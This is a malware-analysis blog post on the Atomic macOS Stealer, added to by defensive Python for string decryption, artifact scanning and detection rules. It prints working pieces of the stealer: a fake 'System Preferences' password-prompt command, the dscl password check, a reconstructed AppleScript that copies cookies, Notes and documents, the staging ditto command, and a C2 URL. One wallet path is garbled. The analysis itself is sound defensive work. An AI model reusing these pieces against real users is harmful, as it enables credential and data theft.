Breaking down Atomic MacOS Stealer (AMOS)

DD
7 min read · Mar 5, 2024


Background

It was a normal day in the life of a Threat Hunter. As I scrolled through my hunting feeds, I found an interesting sample, a Slack.dmg file. I initially suspected it would be a red teaming payload, but further analysis revealed it to be an Atomic Stealer.

The Atomic MacOS Stealer (AMOS) appeared around mid-2023. It is sold in underground forums and Telegram channels. Further details about its functionality can be found in the malware’s advertisement below.

SYSTEM :
- Collecting notes from Notes
- Keychain (Dump of all saved user passwords)
- SystemInfo (Full system information)
- MacOS Password
- Hidden console when launching the

BROWSERS software :
- Safari (Cookies)
- Chrome (Autofills, Passwords, Cookies, Wallets, Cards)
- Firefox (Autofills, Cookies)
- Brave (Cookies, Passwords, Autofills, Wallets, Cards)
- Edge (Cookies, Passwords, Autofills, Wallets, Cards)
- Vivaldi (Cookies, Passwords, Autofills, Wallets, Cards)
- Yandex (Cookies, Autofills, Wallets, Cards)
- Opera (Cookies, Autofills, Wallets, Cards)
- OperaGX (Cookies, Autofills, Wallets, Cards)

WALLETS + PLUGINS :
- Electrum
- Binance
- Exodus
- Atomic
- Coinomi
- More than 60 plugins, including the most popular

———————————
GOOGLE ANTI-LOGIN
- Google Restore - Google anti-login has been implemented.
———————————
- Convenient web panel
- Beautiful dmg installer
- Tapping in telegram (log + notification)

Analysis

The Slack.DMG is an Apple disk image, a common way macOS applications are distributed. Mounting it as a volume and examining the contents revealed a Mach-O binary inside. It is a universal binary, containing two architectures, x86_64 and arm64 (targeting both Intel and Apple silicon Macs). It is ad-hoc signed, which means the signature carries no developer certificate and therefore no cryptographic proof of who built it.

file /Volumes/Slack/Slack 
/Volumes/Slack/Slack: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64:Mach-O 64-bit executable arm64]
/Volumes/Slack/Slack (for architecture x86_64): Mach-O 64-bit executable x86_64
/Volumes/Slack/Slack (for architecture arm64): Mach-O 64-bit executable arm64

codesign -dvv /Volumes/Slack/Slack 
Executable=/Volumes/Slack/Slack
Identifier=setup-5555494478afc55e7c5733d690ad555c942bbdb1
Format=Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=1607 flags=0x2(adhoc) hashes=39+7 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=0 size=12

The extracted strings did not provide any valuable information, suggesting that they are encrypted in this recent campaign. Phil Stokes previously highlighted this observation in a tweet. The threat actors are aware of the detection logic and are trying to evade it.

Installer Image

There was also an installer background image in the mounted volume of the DMG. The image displays instructions for launching the application by right-clicking it and choosing Open, a tactic used to circumvent the warnings shown by Gatekeeper, the integrated security feature in Apple’s operating system. Security researchers have observed this approach in various adware families targeting macOS users.

[Figure: installer background image]

Mach-O binary analysis

The function names in the binary indicate that it was compiled from C++. You can confirm this by looking at the shared libraries the binary links against using otool (included with the Xcode developer tools). The use of libc++.1.dylib is visible in the snippet below:

otool -L /Volumes/Slack/Slack 
/Volumes/Slack/Slack:
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1600.157.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1336.61.1)

Looking at the entry point, we can see that a thread running a function named “hmmm” is created.

String Encryption

At the beginning of the thread function there are stack strings, but in encrypted form. The routine uses SSE (Streaming SIMD Extensions) instructions to copy the bytes into XMM registers and then onto the stack, followed by XOR decryption. The key is the first byte of each encrypted string; in this sample it was the constant 0x41 for every string. Simply stepping through in a debugger yields the decrypted versions.
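The scheme described above is simple enough to reproduce statically instead of stepping through every string in a debugger. The Python below is an added example, not code from the original post or from the malware: it assumes each encrypted blob is laid out as one key byte followed by the XOR-encrypted bytes (the page says the key is the first byte of each string; treating that byte as a prefix rather than part of the text is an assumption made here), decrypts a list of such blobs, and keeps only results that look like printable text. The sample blobs are constructed with the page’s constant key 0x41, plus one with a different key to show the routine does not depend on 0x41.

```python
import string

# Assumed blob layout (an assumption for this example, matching the page's
# description of the sample): <key byte><ciphertext bytes...>, every
# ciphertext byte XORed with that first byte.
def decrypt_stack_string(blob: bytes) -> str:
    """Recover a stack string whose first byte is the XOR key."""
    if not blob:
        raise ValueError("empty blob")
    key = blob[0]
    plain = bytes(b ^ key for b in blob[1:])
    # Stack strings are NUL-terminated once copied into place; stop at the first NUL.
    return plain.split(b"\x00", 1)[0].decode("latin-1")


def encrypt_stack_string(text: str, key: int = 0x41) -> bytes:
    """Inverse of decrypt_stack_string; used here only to build constructed test data."""
    return bytes([key]) + bytes(c ^ key for c in text.encode("latin-1"))


PRINTABLE = set(string.printable) - set("\x0b\x0c")


def looks_like_text(s: str, min_len: int = 4) -> bool:
    """Cheap filter: long enough and entirely printable ASCII."""
    return len(s) >= min_len and all(ch in PRINTABLE for ch in s)


def decrypt_all(blobs) -> list:
    """Decrypt candidate blobs and keep the ones that decode to readable text."""
    out = []
    for blob in blobs:
        try:
            s = decrypt_stack_string(blob)
        except ValueError:
            continue
        if looks_like_text(s):
            out.append(s)
    return out


# Constructed sample blobs (not extracted from the binary): the kinds of strings
# the analysis mentions, encrypted with the page's constant key 0x41, plus one
# blob under a different key and one that decodes to nothing useful.
SAMPLE_BLOBS = [
    encrypt_stack_string("VirtualBox"),
    encrypt_stack_string("Parallels"),
    encrypt_stack_string("Apple Virtual Machine"),
    encrypt_stack_string("login.keychain-db"),
    encrypt_stack_string("sw_vers", key=0x7F),
    bytes([0x41, 0x41, 0x41, 0x41]),  # decrypts to NULs only and is filtered out
]

if __name__ == "__main__":
    for s in decrypt_all(SAMPLE_BLOBS):
        print(s)
```

Note that a plaintext byte equal to the key encrypts to 0x00, so a scanner that harvests candidate blobs from a dump must not stop at the first NUL in the ciphertext; the NUL check is applied only after decryption.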

Anti-VM/ Anti-Debug

A shell command executed AppleScript that hides the Terminal window from the foreground. It was hindering my debugging process, but I am not sure whether this was an intended anti-debug feature. Monitoring for the execution of AppleScript could be valuable for detection or hunting as well.

osascript -e 'tell application "Terminal" to set visible of front window to false'

Then a series of shell commands is spawned to gather hardware, display, and software information, and all of the output is logged to a file called Sysinfo.txt.

system_profiler SPHardwareDataType
system_profiler SPDisplaysDataType
sw_vers

After collecting the data, the malware searches it for specific strings such as “VirtualBox”, “Parallels”, and “Apple Virtual Machine”. If any of these strings are found, the malware terminates itself.

User Password Extraction

The Atomic Stealer extracts the user’s login password by masquerading as a privilege helper via AppleScript. It generates a fake dialog box titled “System Preferences”, tricking the victim into entering their password.

osascript -e 'display dialog "To launch the application, you need to update the system settings \n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer'

When the password is entered, it is verified using dscl, the Directory Service command line utility. The following command performs an authentication test without executing any other operation. If the password is verified, it is saved to a file named “password-entered” in the user directory.

dscl /Local/Default -authonly {user_name}

The stealer copies login.keychain-db to a file named “login-keychain” in the user directory. Later, the extracted files are zipped and exfiltrated to the C2 server.

/Users/{user_name}/Library/Keychains/login.keychain-db

Browser

The Atomic Stealer grabs sensitive data such as autofills, passwords, cookies, and wallets from Chromium-based browsers and Firefox. It specifically targets Chrome, Brave (whose profile directory is Brave-Browser), Edge, Vivaldi, Yandex, Opera, and OperaGX.

For Firefox, it collects the following files:

  • cookies.sqlite: This file in the user’s profile directory stores cookies between sessions.
  • formhistory.sqlite: Used by Firefox to store autocomplete form data.
  • logins.json: Stores encrypted logins.

Crypto Wallets:
The Atomic Stealer collects files and folders from cryptocurrency wallet applications such as Coinbase, Exodus, Electrum, Coinomi, Guarda, Wasabi, Atomic, and Ledger. Moreover, it includes hundreds of browser extension IDs for wallets, enabling it to collect data from those as well.

Exodus/exodus.wallet/
electrum/wallets/
Coinomi/wallets/
Guarda/Local Storage/leveldb/
walletwasabi/client/Wallets/
atomic/Local Stveldb/
Ledger Live/

Telegram data from the directory below was also collected:

./Telegram Desktop/tdata

File Grabber

File Grabber is new functionality added to the malware; it is an AppleScript, shown in the snippet below. It simply uses the Finder application to gather data. It collects the Safari cookie file, Cookies.binarycookies, and also targets the macOS Notes database, NoteStore.sqlite. Additionally, it gathers files from the user’s Desktop and Documents folders that match specific extensions (txt, docx, rtf, doc, wallet, keys, key).

Here is the reconstructed AppleScript:

set baseFolderPath to (path to home folder as text) & "1621866055"
set fileGrabberFolderPath to (path to home folder as text) & "1621866055:FileGrabber:"
tell application "Finder"
    set username to short user name of (system info)
    try
        -- staging sub-folder for the grabbed files
        if not (exists folder fileGrabberFolderPath) then make new folder at folder baseFolderPath with properties {name:"FileGrabber"}

        -- Safari cookies
        set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
        try
            duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing
        end try

        -- Notes database
        set homePath to path to home folder as string
        set sourceFilePath to homePath & "Library:Group Containers:group.com.apple.notes:NoteStore.sqlite"
        try
            set sourceFile to file sourceFilePath
            duplicate sourceFile to folder baseFolderPath
        end try

        -- documents from Desktop and Documents matching the extension list, up to 50 KB each
        set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key"}
        set desktopFiles to every file of desktop
        set documentsFiles to every file of folder "Documents" of (path to home folder)
        repeat with aFile in (desktopFiles & documentsFiles)
            set fileExtension to name extension of aFile
            if fileExtension is in extensionsList then
                set fileSize to size of aFile
                if fileSize ≤ 51200 then duplicate aFile to folder fileGrabberFolderPath with replacing
            end if
        end repeat
    end try
end tell
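The script above leaves a recognisable footprint on disk: a ten-digit folder directly under the home directory holding a FileGrabber sub-folder, the copied Safari cookies and Notes database, the password-entered and login-keychain files, and, after the archive step, a ten-digit .zip beside it. The following Python is an added example for incident responders, not code from the original post or from the malware: it scans a home directory for that footprint. The artifact names come from this analysis; the assumption that all of them sit inside the staging folder (rather than loose in the home directory) is made here, and the sample home directory it builds is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Names taken from the analysis above. Which of them live inside the
# ten-digit staging folder is an assumption for this example.
STAGING_DIR_RE = re.compile(r"^\d{10}$")
STAGING_ZIP_RE = re.compile(r"^\d{10}\.zip$")
KNOWN_ARTIFACTS = (
    "FileGrabber",
    "password-entered",
    "login-keychain",
    "Sysinfo.txt",
    "Cookies.binarycookies",
    "NoteStore.sqlite",
)


def find_amos_staging(home: Path) -> list:
    """Return one finding per suspicious ten-digit folder or zip directly under `home`."""
    findings = []
    for entry in sorted(home.iterdir()):
        if entry.is_dir() and STAGING_DIR_RE.match(entry.name):
            present = [a for a in KNOWN_ARTIFACTS if (entry / a).exists()]
            # A bare ten-digit folder is odd on its own, but only escalate when
            # it also carries the stealer's known file names.
            if present:
                findings.append({"path": str(entry), "kind": "staging_dir", "artifacts": present})
        elif entry.is_file() and STAGING_ZIP_RE.match(entry.name):
            findings.append({"path": str(entry), "kind": "staging_zip", "artifacts": []})
    return findings


def build_constructed_home(root: Path) -> Path:
    """Create a fake home directory mimicking the layout described above (constructed data)."""
    home = root / "victim"
    staging = home / "1621866055"
    (staging / "FileGrabber").mkdir(parents=True)
    (staging / "password-entered").write_text("not-a-real-password\n")
    (staging / "login-keychain").write_bytes(b"\x00keychain-placeholder")
    (staging / "Sysinfo.txt").write_text("Model Name: MacBook Pro\n")
    (home / "1621866055.zip").write_bytes(b"PK\x03\x04")
    # Benign look-alikes that must not be flagged
    (home / "Documents").mkdir()
    (home / "1234").mkdir()          # too short to match
    (home / "9876543210").mkdir()    # ten digits, but none of the known artifacts inside
    return home


def demo() -> list:
    """Build the constructed home in a temp dir, scan it, and return findings with paths relative to home."""
    with tempfile.TemporaryDirectory() as tmp:
        home = build_constructed_home(Path(tmp))
        return [
            dict(f, path=str(Path(f["path"]).relative_to(home)))
            for f in find_amos_staging(home)
        ]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

To run it against a real machine, call find_amos_staging(Path.home()) or point it at each directory under /Users; an empty ten-digit folder is deliberately not reported, so a hit always means at least one of the named artifacts is present.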

Exfiltration

Archive Collected Data
All the collected data is stored in a random folder under the user directory. Before exfiltration, it is archived using the ditto utility with the following command:

ditto -c -k --sequesterRsrc --keepParent /Users/{UserName}/{10 random digits} /Users/{UserName}/{10 random digits}.zip --norsrc --noextattr
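Several of the commands in this write-up are unusual enough to hunt for directly: the AppleScript that hides the Terminal window, the fake “System Preferences” password dialog with a hidden answer (User Password Extraction), the dscl -authonly check, the system_profiler/sw_vers triple used for the VM check, and the ditto archive of a ten-digit folder to a ten-digit .zip shown above. The Python below is an added example, not part of the original post: it runs those rules over a constructed sample of process-execution events. The log line format (ISO time, pid, ppid, command line), the rule names, and the 60-second window for the recon sequence are assumptions made here; the command strings match the ones documented above.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    pid: int
    ppid: int
    cmd: str


# Constructed sample (not a real capture): "ISO-time pid ppid command line".
# Events under ppid 500 replay the sequence described in the analysis;
# events under ppid 600 are benign look-alikes that must not fire.
SAMPLE_LOG = """\
2024-03-05T10:00:01 501 500 /usr/bin/osascript -e tell application "Terminal" to set visible of front window to false
2024-03-05T10:00:02 502 500 /usr/sbin/system_profiler SPHardwareDataType
2024-03-05T10:00:02 503 500 /usr/sbin/system_profiler SPDisplaysDataType
2024-03-05T10:00:03 504 500 /usr/bin/sw_vers
2024-03-05T10:00:05 505 500 /usr/bin/osascript -e display dialog "Please enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer
2024-03-05T10:00:09 506 500 /usr/bin/dscl /Local/Default -authonly victim
2024-03-05T10:00:20 507 500 /usr/bin/ditto -c -k --sequesterRsrc --keepParent /Users/victim/1621866055 /Users/victim/1621866055.zip --norsrc --noextattr
2024-03-05T11:30:00 610 600 /usr/sbin/system_profiler SPHardwareDataType
2024-03-05T11:30:01 611 600 /usr/bin/ditto -c -k /Users/victim/Documents/report /Users/victim/Documents/report.zip
"""

# Single-event rules: (assumed rule name, regex over the command line)
SINGLE_RULES = [
    ("amos_terminal_hide", re.compile(r"osascript.*set visible of front window to false")),
    ("amos_fake_password_prompt",
     re.compile(r'osascript.*display dialog.*with title "System Preferences".*hidden answer')),
    ("amos_password_check", re.compile(r"\bdscl\b.*-authonly")),
    ("amos_staging_archive",
     re.compile(r"\bditto\b.*-c -k.*/Users/[^/\s]+/\d{10}\.zip.*--norsrc.*--noextattr")),
]
# Sequence rule: all three recon commands from one parent within the window.
RECON_PATTERNS = ("SPHardwareDataType", "SPDisplaysDataType", "sw_vers")
RECON_WINDOW = timedelta(seconds=60)


def parse_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        ts, pid, ppid, cmd = line.split(" ", 3)
        events.append(ProcEvent(datetime.fromisoformat(ts), int(pid), int(ppid), cmd))
    return events


def detect(events) -> list:
    """Return (rule_name, pid) pairs; the recon rule reports the pid that completes the triple."""
    hits = []
    recent_by_parent = {}  # ppid -> {pattern: last seen timestamp}
    for ev in sorted(events, key=lambda e: e.ts):
        for name, rx in SINGLE_RULES:
            if rx.search(ev.cmd):
                hits.append((name, ev.pid))
        for pat in RECON_PATTERNS:
            if pat in ev.cmd:
                bucket = recent_by_parent.setdefault(ev.ppid, {})
                bucket[pat] = ev.ts
                # forget recon commands older than the window
                bucket = {p: t for p, t in bucket.items() if ev.ts - t <= RECON_WINDOW}
                recent_by_parent[ev.ppid] = bucket
                if all(p in bucket for p in RECON_PATTERNS):
                    hits.append(("amos_vm_check_recon", ev.pid))
                    recent_by_parent[ev.ppid] = {}


    return hits


if __name__ == "__main__":
    for rule, pid in detect(parse_log(SAMPLE_LOG)):
        print(f"{rule}: pid {pid}")
```

The dscl and ditto rules will also match legitimate administrative use, so treat them as hunt leads to be correlated with the AppleScript prompt and the staging folder rather than as standalone alerts; the sequence rule is keyed on the parent pid precisely because the stealer spawns each command from the same process.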

C2
The stolen data is posted to the C2 server in base64-encoded form. The C2 address is XOR encrypted and base64 encoded as well. The data is posted to the URL below:

hxxp://5[.]42.65.107/joinsystem

Indicators of Compromise (IOCs)

The Atomic Stealer disguises itself as office collaboration or productivity applications in recent campaigns.

008afff67ec8e20b9164c74a5e962dc520466b2d Slack.DMG
1f763ac756ed13f0c08d3ef3c27654a62d3204e9 Slack_MacOS.dmg
474a0150b3eac4a7242ffdcbd32ad9b478e25017 ZoomSetup.dmg
28566de2edf33187ee6de111360d2e4d0fa30be4 Notion.dmg
2d494cdc9d58d3c64ad1dd0b8dd36a539704a47e GoodNotes.dmg
90dd36ac3a4896b51ae89b298f2cdc949631d4a7 TradingView.dmg
4a2f08ae92e00b60381d4c3b1ab2da96b6c9d232 Trello.dmg
68ed3cb921454d7f0e7fde46aea1831ba6c3b4bb Active-App/CrackSetup.dmg
985340ec68c3ccf0a2a4d6fae42b4b121de1db7a CrackSetup.dmg
fb50216347e2017592d2915c21eec50bd2e5facb Notion.dmg
300d2951e80c9c2eef51d34155fb98f034f9d0d4 parallels_mac.dmg
5[.]42.65.107 C2

Conclusion

The analysis of the Atomic MacOS Stealer (AMOS) reveals a sophisticated malware family with evident efforts to evade current XProtect signatures. It shows that threats targeting macOS are constantly evolving. It is crucial for users and organizations to stay vigilant and adopt proactive security measures.

Ongoing research and analysis are essential to stay ahead of cyber adversaries and safeguard against potential breaches.

DD

Threat Hunter | Reverse Engineer | Wanderer in the world of binary